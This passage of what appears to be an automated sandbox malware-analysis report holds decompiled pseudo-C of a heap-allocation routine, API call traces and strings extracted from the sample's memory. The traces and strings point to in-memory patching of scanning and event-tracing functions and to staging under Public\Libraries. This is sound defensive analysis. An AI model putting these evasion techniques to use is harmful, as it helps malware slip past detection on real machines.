                                                                                                  0x028706ea
                                                                                                  0x028706ed
                                                                                                  0x028706f2
                                                                                                  0x028706fc
                                                                                                  0x028706fc
                                                                                                  0x0286f905
                                                                                                  0x0286f8ba

                                                                                                  APIs
                                                                                                  • InetIsOffline.URL(000008AE,00000000,02874C19,?,?,00000000,00000000), ref: 0286C958
                                                                                                    • Part of subcall function 02867B80: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02867C5B), ref: 02867BB8
                                                                                                    • Part of subcall function 02867B80: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BC6
                                                                                                    • Part of subcall function 02867B80: GetProcAddress.KERNEL32(6CFE0000,00000000), ref: 02867BDF
                                                                                                    • Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BFA
                                                                                                    • Part of subcall function 02867B80: VirtualProtectEx.KERNEL32(00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867C00
                                                                                                    • Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02867C2A
                                                                                                    • Part of subcall function 02867B80: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000), ref: 02867C30
                                                                                                    • Part of subcall function 02867B80: FreeLibrary.KERNEL32(6CFE0000,00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000), ref: 02867C3B
                                                                                                    • Part of subcall function 02852EE0: QueryPerformanceCounter.KERNEL32 ref: 02852EE4
                                                                                                    • Part of subcall function 02857E40: GetFileAttributesA.KERNEL32(00000000,028A65D4,0286CCD6,ScanString,02874C4C,ScanBuffer,02874C4C,UacInitialize,02874C4C,UacScan,02874C4C,ScanBuffer,02874C4C,Initialize,02874C4C,ScanString), ref: 02857E4B
                                                                                                    • Part of subcall function 02857E64: GetFileAttributesA.KERNEL32(00000000,028A65D4,0286F486,ScanString,02874C4C,OpenSession,02874C4C,ScanBuffer,02874C4C,OpenSession,02874C4C,ScanString,02874C4C,Initialize,02874C4C,ScanBuffer), ref: 02857E6F
                                                                                                    • Part of subcall function 0285802C: CreateDirectoryA.KERNEL32(00000000,00000000,028A65D4,0286F5A2,ScanBuffer,02874C4C,Initialize,02874C4C,ScanString,02874C4C,OpenSession,02874C4C,ScanBuffer,02874C4C,OpenSession,02874C4C), ref: 02858039
                                                                                                    • Part of subcall function 0286BCF4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286BDC6), ref: 0286BD33
                                                                                                    • Part of subcall function 0286BCF4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0286BD6D
                                                                                                    • Part of subcall function 0286BCF4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0286BD9A
                                                                                                    • Part of subcall function 0286BCF4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0286BDA3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCreateCurrentLibraryPathProcessVirtualWrite$AddressCloseCounterDirectoryFreeHandleInetLoadMemoryModuleNameName_OfflinePerformanceProcProtectQuery
                                                                                                  • String ID: .url$Advapi$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$DEEX$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GET$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$ScanBuffer$ScanString$SetUnhandledExceptionFilter$URL=file:"$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$connect$endpointdlp$http$iexpress.exe$kernel32$ntdll$psapi$tig$ws2_32
                                                                                                  • API String ID: 3306046263-2200116874
                                                                                                  • Opcode ID: 695106b2225a18d6e5b13b1532bf6416e6a41d0e1262edc4b7b9584e25bcefbf
                                                                                                  • Instruction ID: 7b0c228145328bf16159388f5d8bce589929b108d56a557eca88f99c63ebd87f
                                                                                                  • Opcode Fuzzy Hash: 695106b2225a18d6e5b13b1532bf6416e6a41d0e1262edc4b7b9584e25bcefbf
                                                                                                  • Instruction Fuzzy Hash: 4DB3323DA001698BEB10EB58DD80BDEB3FBAB85301F5085A29909E7314DE74EEC59F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  [Figure: control-flow graph; legend: Executed / Not Executed]
                                                                                                  C-Code - Quality: 67%
                                                                                                  			E02851724(signed int __eax) {
                                                                                                  				signed int __ebx;
                                                                                                  				signed int __edi;
                                                                                                  				signed int __esi;
                                                                                                  				void* _t96;
                                                                                                  				void** _t99;
                                                                                                  				signed int _t104;
                                                                                                  				signed int _t109;
                                                                                                  				signed int _t110;
                                                                                                  				intOrPtr* _t114;
                                                                                                  				void* _t116;
                                                                                                  				void* _t121;
                                                                                                  				signed int _t125;
                                                                                                  				signed int _t129;
                                                                                                  				signed int _t131;
                                                                                                  				signed int _t132;
                                                                                                  				signed int _t133;
                                                                                                  				signed int _t134;
                                                                                                  				signed int _t135;
                                                                                                  				unsigned int _t141;
                                                                                                  				signed int _t142;
                                                                                                  				void* _t144;
                                                                                                  				void* _t147;
                                                                                                  				intOrPtr _t148;
                                                                                                  				signed int _t150;
                                                                                                  				long _t156;
                                                                                                  				intOrPtr _t159;
                                                                                                  				signed int _t162;
                                                                                                  
                                                                                                  				_t129 =  *0x28a304d; // 0x0
                                                                                                  				if(__eax > 0xa2c) {
                                                                                                  					__eflags = __eax - 0x40a2c;
                                                                                                  					if(__eax > 0x40a2c) {
                                                                                                  						_pop(_t120);
                                                                                                  						__eflags = __eax;
                                                                                                  						if(__eax >= 0) {
                                                                                                  							_push(_t120);
                                                                                                  							_t162 = __eax;
                                                                                                  							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                                                                  							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
                                                                                                  							_t121 = _t96;
                                                                                                  							if(_t121 != 0) {
                                                                                                  								_t147 = _t121;
                                                                                                  								 *((intOrPtr*)(_t147 + 8)) = _t162;
                                                                                                  								 *(_t147 + 0xc) = _t156 | 0x00000004;
                                                                                                  								E02851644();
                                                                                                  								_t99 =  *0x28a57b0; // 0x7ebd0000
                                                                                                  								 *_t147 = 0x28a57ac;
                                                                                                  								 *0x28a57b0 = _t121;
                                                                                                  								 *(_t147 + 4) = _t99;
                                                                                                  								 *_t99 = _t121;
                                                                                                  								 *0x28a57a8 = 0;
                                                                                                  								_t121 = _t121 + 0x10;
                                                                                                  							}
                                                                                                  							return _t121;
                                                                                                  						} else {
                                                                                                  							__eflags = 0;
                                                                                                  							return 0;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
                                                                                                  						__eflags = _t129;
                                                                                                  						if(__eflags != 0) {
                                                                                                  							while(1) {
                                                                                                  								asm("lock cmpxchg [0x28a3718], ah");
                                                                                                  								if(__eflags == 0) {
                                                                                                  									goto L39;
                                                                                                  								}
                                                                                                  								Sleep(0);
                                                                                                  								asm("lock cmpxchg [0x28a3718], ah");
                                                                                                  								if(__eflags != 0) {
                                                                                                  									Sleep(0xa);
                                                                                                  									continue;
                                                                                                  								}
                                                                                                  								goto L39;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						L39:
                                                                                                  						_t141 = _t125 - 0xb30;
                                                                                                  						_t142 = _t141 >> 0xd;
                                                                                                  						_t131 = _t141 >> 8;
                                                                                                  						_t104 = 0xffffffff << _t131 &  *(0x28a3728 + _t142 * 4);
                                                                                                  						__eflags = 0xffffffff;
                                                                                                  						if(0xffffffff == 0) {
                                                                                                  							_t132 = _t142;
                                                                                                  							__eflags = 0xfffffffe << _t132 &  *0x28a3724;
                                                                                                  							if((0xfffffffe << _t132 &  *0x28a3724) == 0) {
                                                                                                  								_t133 =  *0x28a3720; // 0xea190
                                                                                                  								_t134 = _t133 - _t125;
                                                                                                  								__eflags = _t134;
                                                                                                  								if(_t134 < 0) {
                                                                                                  									_t109 = E028515CC(_t125);
                                                                                                  								} else {
                                                                                                  									_t110 =  *0x28a371c; // 0x40ba1a0
                                                                                                  									_t109 = _t110 - _t125;
                                                                                                  									 *0x28a371c = _t109;
                                                                                                  									 *0x28a3720 = _t134;
                                                                                                  									 *(_t109 - 4) = _t125 | 0x00000002;
                                                                                                  								}
                                                                                                  								 *0x28a3718 = 0;
                                                                                                  								return _t109;
                                                                                                  							} else {
                                                                                                  								asm("bsf edx, eax");
                                                                                                  								asm("bsf ecx, eax");
                                                                                                  								_t135 = _t132 | _t142 << 0x00000005;
                                                                                                  								goto L47;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							asm("bsf eax, eax");
                                                                                                  							_t135 = _t131 & 0xffffffe0 | _t104;
                                                                                                  							L47:
                                                                                                  							_push(_t152);
                                                                                                  							_push(_t145);
                                                                                                  							_t148 = 0x28a37a8 + _t135 * 8;
                                                                                                  							_t159 =  *((intOrPtr*)(_t148 + 4));
                                                                                                  							_t114 =  *((intOrPtr*)(_t159 + 4));
                                                                                                  							 *((intOrPtr*)(_t148 + 4)) = _t114;
                                                                                                  							 *_t114 = _t148;
                                                                                                  							__eflags = _t148 - _t114;
                                                                                                  							if(_t148 == _t114) {
                                                                                                  								asm("rol eax, cl");
                                                                                                  								_t80 = 0x28a3728 + _t142 * 4;
                                                                                                  								 *_t80 =  *(0x28a3728 + _t142 * 4) & 0xfffffffe;
                                                                                                  								__eflags =  *_t80;
                                                                                                  								if( *_t80 == 0) {
                                                                                                  									asm("btr [0x28a3724], edx");
                                                                                                  								}
                                                                                                  							}
                                                                                                  							_t150 = 0xfffffff0 &  *(_t159 - 4);
                                                                                                  							_t144 = 0xfffffff0 - _t125;
                                                                                                  							__eflags = 0xfffffff0;
                                                                                                  							if(0xfffffff0 == 0) {
                                                                                                  								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
                                                                                                  								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
                                                                                                  								__eflags =  *_t89;
                                                                                                  							} else {
                                                                                                  								_t116 = _t125 + _t159;
                                                                                                  								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
                                                                                                  								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
                                                                                                  								__eflags = 0xfffffff0 - 0xb30;
                                                                                                  								if(0xfffffff0 >= 0xb30) {
                                                                                                  									E02851500(_t116, 0xfffffffffffffff3, _t144);
                                                                                                  								}
                                                                                                  							}
                                                                                                  							 *(_t159 - 4) = _t125 + 2;
                                                                                                  							 *0x28a3718 = 0;
                                                                                                  							return _t159;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					__eflags = __cl;
                                                                                                  					__eax =  *(__edx + 0x28a35c0) & 0x000000ff;
                                                                                                  					__ebx = 0x2877040 + ( *(__edx + 0x28a35c0) & 0x000000ff) * 8;
                                                                                                  					if(__eflags != 0) {
                                                                                                  						while(1) {
                                                                                                  							__eax = 0x100;
                                                                                                  							asm("lock cmpxchg [ebx], ah");
                                                                                                  							if(__eflags == 0) {
                                                                                                  								goto L5;
                                                                                                  							}
                                                                                                  							__ebx = __ebx + 0x20;
                                                                                                  							__eflags = __ebx;
                                                                                                  							__eax = 0x100;
                                                                                                  							asm("lock cmpxchg [ebx], ah");
                                                                                                  							if(__ebx != 0) {
                                                                                                  								__ebx = __ebx + 0x20;
                                                                                                  								__eflags = __ebx;
                                                                                                  								__eax = 0x100;
                                                                                                  								asm("lock cmpxchg [ebx], ah");
                                                                                                  								if(__ebx != 0) {
                                                                                                  									__ebx = __ebx - 0x40;
                                                                                                  									__eflags = __ebx;
                                                                                                  									Sleep(0);
                                                                                                  									__eax = 0x100;
                                                                                                  									asm("lock cmpxchg [ebx], ah");
                                                                                                  									if(__eflags != 0) {
                                                                                                  										Sleep(0xa);
                                                                                                  										continue;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  							goto L5;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					L5:
                                                                                                  					__edx =  *(__ebx + 4);
                                                                                                  					__eax =  *(__edx + 8);
                                                                                                  					__ecx = 0xfffffff8;
                                                                                                  					__eflags = __edx - __ebx;
                                                                                                  					if(__edx == __ebx) {
                                                                                                  						__edx =  *(__ebx + 0x10);
                                                                                                  						__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                                                  						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                                                                                                  						__eflags = __eax -  *(__ebx + 0xc);
                                                                                                  						if(__eax >  *(__ebx + 0xc)) {
                                                                                                  							_push(__esi);
                                                                                                  							_push(__edi);
                                                                                                  							__eflags =  *0x28a304d;
                                                                                                  							if(__eflags != 0) {
                                                                                                  								while(1) {
                                                                                                  									__eax = 0x100;
                                                                                                  									asm("lock cmpxchg [0x28a3718], ah");
                                                                                                  									if(__eflags == 0) {
                                                                                                  										goto L20;
                                                                                                  									}
                                                                                                  									Sleep(0);
                                                                                                  									__eax = 0x100;
                                                                                                  									asm("lock cmpxchg [0x28a3718], ah");
                                                                                                  									if(__eflags != 0) {
                                                                                                  										Sleep(0xa);
                                                                                                  										continue;
                                                                                                  									}
                                                                                                  									goto L20;
                                                                                                  								}
                                                                                                  							}
                                                                                                  							L20:
                                                                                                  							 *(__ebx + 1) =  *(__ebx + 1) &  *0x28a3724;
                                                                                                  							__eflags =  *(__ebx + 1) &  *0x28a3724;
                                                                                                  							if(( *(__ebx + 1) &  *0x28a3724) == 0) {
                                                                                                  								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
                                                                                                  								__edi =  *0x28a3720; // 0xea190
                                                                                                  								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
                                                                                                  								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
                                                                                                  									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
                                                                                                  									__edi = __eax;
                                                                                                  									__eax = E028515CC(__eax);
                                                                                                  									__esi = __eax;
                                                                                                  									__eflags = __eax;
                                                                                                  									if(__eax != 0) {
                                                                                                  										goto L33;
                                                                                                  									} else {
                                                                                                  										 *0x28a3718 = __al;
                                                                                                  										 *__ebx = __al;
                                                                                                  										_pop(__edi);
                                                                                                  										_pop(__esi);
                                                                                                  										_pop(__ebx);
                                                                                                  										return __eax;
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									__esi =  *0x28a371c; // 0x40ba1a0
                                                                                                  									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
                                                                                                  									__edx = __ecx + 0xb30;
                                                                                                  									__eflags = __edi - __ecx + 0xb30;
                                                                                                  									if(__edi >= __ecx + 0xb30) {
                                                                                                  										__edi = __ecx;
                                                                                                  									}
                                                                                                  									__esi = __esi - __edi;
                                                                                                  									 *0x28a3720 =  *0x28a3720 - __edi;
                                                                                                  									 *0x28a371c = __esi;
                                                                                                  									goto L33;
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								asm("bsf eax, esi");
                                                                                                  								__esi = __eax * 8;
                                                                                                  								__ecx =  *(0x28a3728 + __eax * 4);
                                                                                                  								asm("bsf ecx, ecx");
                                                                                                  								__ecx =  *(0x28a3728 + __eax * 4) + __eax * 8 * 4;
                                                                                                  								__edi = 0x28a37a8 + ( *(0x28a3728 + __eax * 4) + __eax * 8 * 4) * 8;
                                                                                                  								__esi =  *(__edi + 4);
                                                                                                  								__edx =  *(__esi + 4);
                                                                                                  								 *(__edi + 4) = __edx;
                                                                                                  								 *__edx = __edi;
                                                                                                  								__eflags = __edi - __edx;
                                                                                                  								if(__edi == __edx) {
                                                                                                  									__edx = 0xfffffffe;
                                                                                                  									asm("rol edx, cl");
                                                                                                  									_t38 = 0x28a3728 + __eax * 4;
                                                                                                  									 *_t38 =  *(0x28a3728 + __eax * 4) & 0xfffffffe;
                                                                                                  									__eflags =  *_t38;
                                                                                                  									if( *_t38 == 0) {
                                                                                                  										asm("btr [0x28a3724], eax");
                                                                                                  									}
                                                                                                  								}
                                                                                                  								__edi = 0xfffffff0;
                                                                                                  								__edi = 0xfffffff0 &  *(__esi - 4);
                                                                                                  								__eflags = 0xfffffff0 - 0x10a60;
                                                                                                  								if(0xfffffff0 < 0x10a60) {
                                                                                                  									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
                                                                                                  									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
                                                                                                  									__eflags =  *_t52;
                                                                                                  								} else {
                                                                                                  									__edx = __edi;
                                                                                                  									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
                                                                                                  									__edx = __edx - __edi;
                                                                                                  									__eax = __edi + __esi;
                                                                                                  									__ecx = __edx + 3;
                                                                                                  									 *(__eax - 4) = __ecx;
                                                                                                  									 *(__edx + __eax - 8) = __edx;
                                                                                                  									__eax = E02851500(__eax, __ecx, __edx);
                                                                                                  								}
                                                                                                  								L33:
                                                                                                  								_t56 = __edi + 6; // 0xea196
                                                                                                  								__ecx = _t56;
                                                                                                  								 *(__esi - 4) = _t56;
                                                                                                  								__eax = 0;
                                                                                                  								 *0x28a3718 = __al;
                                                                                                  								 *__esi = __ebx;
                                                                                                  								 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                                  								 *((intOrPtr*)(__esi + 0xc)) = 1;
                                                                                                  								 *(__ebx + 0x10) = __esi;
                                                                                                  								_t61 = __esi + 0x20; // 0x40ba1c0
                                                                                                  								__eax = _t61;
                                                                                                  								__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                                                  								__edx = __ecx + __eax;
                                                                                                  								 *(__ebx + 8) = __ecx + __eax;
                                                                                                  								__edi = __edi + __esi;
                                                                                                  								__edi = __edi - __ecx;
                                                                                                  								__eflags = __edi;
                                                                                                  								 *(__ebx + 0xc) = __edi;
                                                                                                  								 *__ebx = 0;
                                                                                                  								 *(__eax - 4) = __esi;
                                                                                                  								_pop(__edi);
                                                                                                  								_pop(__esi);
                                                                                                  								_pop(__ebx);
                                                                                                  								return __eax;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t19 = __edx + 0xc;
                                                                                                  							 *_t19 =  *(__edx + 0xc) + 1;
                                                                                                  							__eflags =  *_t19;
                                                                                                  							 *(__ebx + 8) = __ecx;
                                                                                                  							 *__ebx = 0;
                                                                                                  							 *(__eax - 4) = __edx;
                                                                                                  							_pop(__ebx);
                                                                                                  							return __eax;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
                                                                                                  						__ecx = 0xfffffff8 &  *(__eax - 4);
                                                                                                  						__eflags = 0xfffffff8;
                                                                                                  						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
                                                                                                  						 *(__eax - 4) = __edx;
                                                                                                  						if(0xfffffff8 == 0) {
                                                                                                  							__ecx =  *(__edx + 4);
                                                                                                  							 *(__ecx + 0x14) = __ebx;
                                                                                                  							 *(__ebx + 4) = __ecx;
                                                                                                  							 *__ebx = 0;
                                                                                                  							_pop(__ebx);
                                                                                                  							return __eax;
                                                                                                  						} else {
                                                                                                  							 *__ebx = 0;
                                                                                                  							_pop(__ebx);
                                                                                                  							return __eax;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}






























                                                                                                  0x028519e7
                                                                                                  0x028519e9
                                                                                                  0x028519ee
                                                                                                  0x028519f7
                                                                                                  0x028519f7
                                                                                                  0x02851a03
                                                                                                  0x02851a0b
                                                                                                  0x028519c1
                                                                                                  0x028519c1
                                                                                                  0x028519cb
                                                                                                  0x028519d3
                                                                                                  0x00000000
                                                                                                  0x028519d3
                                                                                                  0x028519a4
                                                                                                  0x028519a7
                                                                                                  0x028519aa
                                                                                                  0x02851a0c
                                                                                                  0x02851a0c
                                                                                                  0x02851a0d
                                                                                                  0x02851a0e
                                                                                                  0x02851a15
                                                                                                  0x02851a18
                                                                                                  0x02851a1b
                                                                                                  0x02851a1e
                                                                                                  0x02851a20
                                                                                                  0x02851a22
                                                                                                  0x02851a29
                                                                                                  0x02851a2b
                                                                                                  0x02851a2b
                                                                                                  0x02851a2b
                                                                                                  0x02851a32
                                                                                                  0x02851a34
                                                                                                  0x02851a34
                                                                                                  0x02851a32
                                                                                                  0x02851a40
                                                                                                  0x02851a45
                                                                                                  0x02851a45
                                                                                                  0x02851a47
                                                                                                  0x02851a68
                                                                                                  0x02851a68
                                                                                                  0x02851a68
                                                                                                  0x02851a49
                                                                                                  0x02851a49
                                                                                                  0x02851a4f
                                                                                                  0x02851a52
                                                                                                  0x02851a56
                                                                                                  0x02851a5c
                                                                                                  0x02851a5e
                                                                                                  0x02851a5e
                                                                                                  0x02851a5c
                                                                                                  0x02851a70
                                                                                                  0x02851a73
                                                                                                  0x02851a7f
                                                                                                  0x02851a7f
                                                                                                  0x028519a2
                                                                                                  0x0285173c
                                                                                                  0x0285173c
                                                                                                  0x0285173e
                                                                                                  0x02851745
                                                                                                  0x0285174c
                                                                                                  0x028517a4
                                                                                                  0x028517a4
                                                                                                  0x028517a9
                                                                                                  0x028517ad
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x028517af
                                                                                                  0x028517af
                                                                                                  0x028517b2
                                                                                                  0x028517b7
                                                                                                  0x028517bb
                                                                                                  0x028517bd
                                                                                                  0x028517bd
                                                                                                  0x028517c0
                                                                                                  0x028517c5
                                                                                                  0x028517c9
                                                                                                  0x028517cb
                                                                                                  0x028517cb
                                                                                                  0x028517d0
                                                                                                  0x028517d5
                                                                                                  0x028517da
                                                                                                  0x028517de
                                                                                                  0x028517e6
                                                                                                  0x00000000
                                                                                                  0x028517e6
                                                                                                  0x028517de
                                                                                                  0x028517c9
                                                                                                  0x00000000
                                                                                                  0x028517bb
                                                                                                  0x028517a4
                                                                                                  0x0285174e
                                                                                                  0x0285174e
                                                                                                  0x02851751
                                                                                                  0x02851754
                                                                                                  0x02851759
                                                                                                  0x0285175b
                                                                                                  0x02851774
                                                                                                  0x02851777
                                                                                                  0x0285177b
                                                                                                  0x0285177d
                                                                                                  0x02851780
                                                                                                  0x028517f0
                                                                                                  0x028517f1
                                                                                                  0x028517f2
                                                                                                  0x028517f9
                                                                                                  0x028517fb
                                                                                                  0x028517fb
                                                                                                  0x02851800
                                                                                                  0x02851808
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0285180c
                                                                                                  0x02851811
                                                                                                  0x02851816
                                                                                                  0x0285181e
                                                                                                  0x02851822
                                                                                                  0x00000000
                                                                                                  0x02851822
                                                                                                  0x00000000
                                                                                                  0x0285181e
                                                                                                  0x028517fb
                                                                                                  0x0285182c
                                                                                                  0x02851830
                                                                                                  0x02851830
                                                                                                  0x02851836
                                                                                                  0x028518a8
                                                                                                  0x028518ac
                                                                                                  0x028518b2
                                                                                                  0x028518b4
                                                                                                  0x028518dc
                                                                                                  0x028518e0
                                                                                                  0x028518e2
                                                                                                  0x028518e7
                                                                                                  0x028518e9
                                                                                                  0x028518eb
                                                                                                  0x00000000
                                                                                                  0x028518ed
                                                                                                  0x028518ed
                                                                                                  0x028518f2
                                                                                                  0x028518f4
                                                                                                  0x028518f5
                                                                                                  0x028518f6
                                                                                                  0x028518f7
                                                                                                  0x028518f7
                                                                                                  0x028518b6
                                                                                                  0x028518b6
                                                                                                  0x028518bc
                                                                                                  0x028518c0
                                                                                                  0x028518c6
                                                                                                  0x028518c8
                                                                                                  0x028518ca
                                                                                                  0x028518ca
                                                                                                  0x028518cc
                                                                                                  0x028518ce
                                                                                                  0x028518d4
                                                                                                  0x00000000
                                                                                                  0x028518d4
                                                                                                  0x02851838
                                                                                                  0x02851838
                                                                                                  0x0285183b
                                                                                                  0x02851842
                                                                                                  0x02851849
                                                                                                  0x0285184c
                                                                                                  0x0285184f
                                                                                                  0x02851856
                                                                                                  0x02851859
                                                                                                  0x0285185c
                                                                                                  0x0285185f
                                                                                                  0x02851861
                                                                                                  0x02851863
                                                                                                  0x02851865
                                                                                                  0x0285186a
                                                                                                  0x0285186c
                                                                                                  0x0285186c
                                                                                                  0x0285186c
                                                                                                  0x02851873
                                                                                                  0x02851875
                                                                                                  0x02851875
                                                                                                  0x02851873
                                                                                                  0x0285187c
                                                                                                  0x02851881
                                                                                                  0x02851884
                                                                                                  0x0285188a
                                                                                                  0x028518f8
                                                                                                  0x028518f8
                                                                                                  0x028518f8
                                                                                                  0x0285188c
                                                                                                  0x0285188c
                                                                                                  0x0285188e
                                                                                                  0x02851892
                                                                                                  0x02851894
                                                                                                  0x02851897
                                                                                                  0x0285189a
                                                                                                  0x0285189d
                                                                                                  0x028518a1
                                                                                                  0x028518a1
                                                                                                  0x028518fd
                                                                                                  0x028518fd
                                                                                                  0x028518fd
                                                                                                  0x02851900
                                                                                                  0x02851903
                                                                                                  0x02851905
                                                                                                  0x0285190a
                                                                                                  0x0285190c
                                                                                                  0x0285190f
                                                                                                  0x02851916
                                                                                                  0x02851919
                                                                                                  0x02851919
                                                                                                  0x0285191c
                                                                                                  0x02851920
                                                                                                  0x02851923
                                                                                                  0x02851926
                                                                                                  0x02851928
                                                                                                  0x02851928
                                                                                                  0x0285192a
                                                                                                  0x0285192d
                                                                                                  0x02851930
                                                                                                  0x02851933
                                                                                                  0x02851934
                                                                                                  0x02851935
                                                                                                  0x02851936
                                                                                                  0x02851936
                                                                                                  0x02851782
                                                                                                  0x02851782
                                                                                                  0x02851782
                                                                                                  0x02851782
                                                                                                  0x02851786
                                                                                                  0x02851789
                                                                                                  0x0285178c
                                                                                                  0x0285178f
                                                                                                  0x02851790
                                                                                                  0x02851790
                                                                                                  0x0285175d
                                                                                                  0x0285175d
                                                                                                  0x02851761
                                                                                                  0x02851761
                                                                                                  0x02851764
                                                                                                  0x02851767
                                                                                                  0x0285176a
                                                                                                  0x02851794
                                                                                                  0x02851797
                                                                                                  0x0285179a
                                                                                                  0x0285179d
                                                                                                  0x028517a0
                                                                                                  0x028517a1
                                                                                                  0x0285176c
                                                                                                  0x0285176c
                                                                                                  0x0285176f
                                                                                                  0x02851770
                                                                                                  0x02851770
                                                                                                  0x0285176a
                                                                                                  0x0285175b

                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000), ref: 028517D0
                                                                                                  • Sleep.KERNEL32(0000000A,00000000), ref: 028517E6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3472027048-0
                                                                                                  • Opcode ID: d496db75d5a48851c87e8cf58e9eadcbe6d5b423d3e4f9a177ddc599c8668f9b
